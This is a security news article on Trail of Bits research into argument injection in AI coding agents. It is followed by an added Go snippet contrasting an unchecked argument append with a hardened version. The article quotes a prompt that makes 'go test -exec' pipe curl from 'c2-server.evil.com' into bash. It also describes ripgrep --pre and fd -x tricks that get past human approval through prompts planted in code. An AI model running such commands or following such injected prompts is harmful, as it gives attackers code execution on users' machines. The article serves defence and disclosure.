A critical argument injection flaw in three unnamed but popular AI agent platforms allows attackers to bypass human approval safeguards and achieve remote code execution (RCE) through seemingly innocuous prompts.
According to Trail of Bits, these vulnerabilities exploit pre-approved system commands intended to make tasks like file searches and code analysis efficient, highlighting a common design flaw in agentic AI systems.
AI agents rely on native tools such as find, grep, git, and go test to handle filesystem operations and version control without reinventing that functionality, which brings benefits in performance, reliability, and development speed.
However, these pre-approved commands create an attack surface whenever user input influences their arguments, enabling argument injection as defined by CWE-88.
Systems typically validate commands against allowlists but overlook argument flags, and blanket blocking is impractical because of the vast parameter space of these utilities.
For example, a simplified Go function checks whether a command like "grep" is safe but appends user-provided arguments unchecked, leaving room for exploitation.
This antipattern persists because selective filtering demands exhaustive knowledge of each command's options, a challenge amplified by the dynamic nature of AI-generated invocations.
In one CLI-based agent, attackers crafted a prompt to run "go test -exec 'bash -c "curl c2-server.evil.com?unittest= | bash; echo success"'", leveraging the -exec flag to introduce unauthorized curl and bash commands and achieving RCE without approval.
Another example bypassed regex filters by using git show with hex-encoded payloads to create a file, followed by ripgrep's --pre flag to execute it, all through JSON-formatted prompts that nudged the model toward tool use, according to Trail of Bits.
Attack Patterns
A facade pattern vulnerability in a third system appended malicious flags like "-x=python3" to an fd command, executing a pre-created Python payload that used os.system for arbitrary actions.
These one-shot attacks, which can be embedded in code comments or repositories, draw from the "living off the land" techniques cataloged by the GTFOBins and LOLBAS projects.
Prior disclosures, including Johann Rehberger's August 2025 writeups on Amazon Q command injection and CVEs like CVE-2025-54795 in Claude Code, echo these risks.
To counter these threats, the researchers recommend sandboxing as the primary defense, using containers, WebAssembly, or OS-level isolation like Seatbelt on macOS to limit what the agent can reach.
For facade patterns, always insert an argument separator like "--" before user inputs and disable shell execution with methods like subprocess.run(shell=False).
Safe command allowlists remain flawed without sandboxes, since tools like find permit code execution through flags alone, so allowlisted tools should be audited against LOLBAS resources.
Developers should implement logging, shrink allowlists, and reintroduce human-in-the-loop approval for suspicious command chains; users should restrict access and run untrusted inputs inside containers.
Security engineers can map an agent's tools through prompts or documentation, fuzz their flags, and compare the results against exploit databases. As agentic AI proliferates, these coordinated disclosures signal a shift toward prioritizing security before these patterns become entrenched.
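As an added illustration (not Trail of Bits' code, nor code from any of the affected platforms), the Go snippet below contrasts the unchecked-append facade described earlier with a hardened variant that applies the two mitigations above: rejecting flag-shaped user tokens, inserting "--" before user input, and running the result through exec.Command rather than a shell. The allowlist contents and function names are assumptions made for the example.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"strings"
)

var (
	ErrNotAllowed      = errors.New("command not in allowlist")
	ErrFlagInUserInput = errors.New("flag-like token in user-controlled arguments")
)

// Hypothetical allowlist of pre-approved commands (an assumption for this example).
var allowed = map[string]bool{"grep": true, "find": true, "git": true}

// BuildArgsVulnerable reproduces the antipattern described in the article: the command
// name is checked, but user-supplied arguments are appended unchecked, so a token such
// as "--pre=..." is parsed by the tool as a flag rather than as data.
func BuildArgsVulnerable(cmd string, userArgs []string) ([]string, error) {
	if !allowed[cmd] {
		return nil, ErrNotAllowed
	}
	return append([]string{cmd}, userArgs...), nil
}

// BuildArgsHardened applies the two mitigations recommended for facade patterns:
// reject any user-controlled token that looks like a flag, and insert "--" so that
// everything after it is treated as positional. fixedArgs are agent-chosen flags,
// never user input. "--" only helps for tools whose parsers honor it (getopt-style
// ones do; not every CLI does), so this complements sandboxing rather than replacing it.
func BuildArgsHardened(cmd string, fixedArgs, userArgs []string) ([]string, error) {
	if !allowed[cmd] {
		return nil, ErrNotAllowed
	}
	for _, a := range userArgs {
		if strings.HasPrefix(a, "-") {
			return nil, fmt.Errorf("%w: %q", ErrFlagInUserInput, a)
		}
	}
	argv := append([]string{cmd}, fixedArgs...)
	argv = append(argv, "--")
	return append(argv, userArgs...), nil
}

// Run executes argv directly via exec.Command: no shell, so no "sh -c" reinterpretation.
func Run(argv []string) ([]byte, error) {
	return exec.Command(argv[0], argv[1:]...).CombinedOutput()
}
```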